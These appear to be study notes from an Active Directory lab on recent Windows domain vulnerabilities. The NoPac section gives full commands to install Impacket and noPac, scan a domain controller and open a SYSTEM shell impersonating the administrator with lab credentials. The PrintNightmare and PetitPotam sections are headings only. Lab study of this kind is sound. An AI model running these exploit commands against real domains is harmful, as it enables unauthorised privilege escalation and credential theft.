22.Bleeding Edge Vulnerabilities
I. NoPac (SamAccountName Spoofing) - Domain Privilege Escalation
Impacket Setup (Required Dependencies)
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py installNoPac Tool Retrieval
git clone https://github.com/Ridter/noPac.git
cd noPacVulnerability Scanning
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldapInteractive Shell as SYSTEM
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldapDCSync (Domain Credential Extraction)
Checking for Created Files
II. PrintNightmare (Print Spooler Vulnerability) - Remote Code Execution
Exploit Retrieval
Impacket Setup (cube0x0 Version)
Service Enumeration
Payload Generation (Metasploit)
SMB Share Setup
Metasploit Listener Setup
Exploit Execution
Meterpreter Interaction
III. PetitPotam (MS-EFSRPC) - Domain Compromise via NTLM Relay
NTLM Relay Setup
Authentication Coercion
TGT Request (PKINITtools)
KRB5CCNAME Setup
DCSync (Credential Extraction)
Last updated